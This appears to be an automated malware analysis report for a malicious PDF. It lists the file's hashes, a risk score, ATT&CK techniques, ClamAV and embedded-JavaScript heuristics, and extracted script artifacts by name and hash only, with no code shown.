Malicious PDF — malware analysis report

Static analysis result for SHA-256 b540b1bed77ef935…

MALICIOUS

PDF

45.0 KB
MD5: 5eb43fd542433b44e231ce5b83c2ed6f SHA-1: 40d7d33a203643b38a44dfaa0e8bd3456503ef59 SHA-256: b540b1bed77ef9350bf9885731b78901d041355578b40eae1861ef072ab0fd55
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The critical ClamAV heuristic 'Pdf.Exploit.Agent-36128' strongly indicates malicious intent. The presence of embedded JavaScript, identified by 'PDF_JAVASCRIPT' and 'PDF_JS' heuristics, suggests the PDF is designed to exploit vulnerabilities and execute code. The large size of the deobfuscated JavaScript further supports the idea that it contains malicious logic, likely for downloading and executing a secondary payload.

Heuristics 3

  • ClamAV: Pdf.Exploit.Agent-36128 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
4ce48a415a828290e151385a1d53b25ef7d59000eb7bcc61269ef4751ddade0d		 pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 45305 bytes
legacy_pdfkit_stage_000.js
2de49a0d4f0d06b23eace976e99ecc92fa41f23fdd479da1a5b6fc978ced988e		 deobfuscated-js double percent-decoded annotation JavaScript at offset 0x1E7 33047 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.